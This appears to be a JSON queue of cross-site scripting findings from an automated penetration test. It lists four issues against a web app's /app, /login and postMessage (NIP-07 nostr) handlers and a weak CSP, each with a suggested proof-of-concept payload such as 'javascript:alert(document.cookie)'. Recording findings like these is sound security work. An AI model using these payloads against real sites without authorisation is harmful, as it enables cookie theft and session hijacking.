archy/loop/pentest/analysis/queue.json

{
  "findings": [
    {
      "id": "XSS-001",
      "type": "dom_based_xss_iframe_src_injection",
      "endpoint": "/app/:appId",
      "parameter": "path (query)",
      "confidence": "medium",
      "payload_suggestion": "/app/indeedhub?path=%23<img+onerror=alert(1)+src=x>"
    },
    {
      "id": "XSS-002",
      "type": "dom_based_xss_javascript_uri_redirect",
      "endpoint": "/login",
      "parameter": "redirect (query)",
      "confidence": "medium",
      "payload_suggestion": "/login?redirect=javascript:alert(document.cookie)"
    },
    {
      "id": "XSS-003",
      "type": "dom_based_cross_origin_message_injection",
      "endpoint": "postMessage handler (NIP-07)",
      "parameter": "event.data (nostr-request)",
      "confidence": "high",
      "payload_suggestion": "window.parent.postMessage({type:'nostr-request',id:'1',method:'getPublicKey'},'*')"
    },
    {
      "id": "XSS-004",
      "type": "weak_csp_unsafe_inline",
      "endpoint": "all pages (nginx)",
      "parameter": "n/a",
      "confidence": "high",
      "payload_suggestion": "n/a - amplification factor, not direct XSS"
    }
  ]
}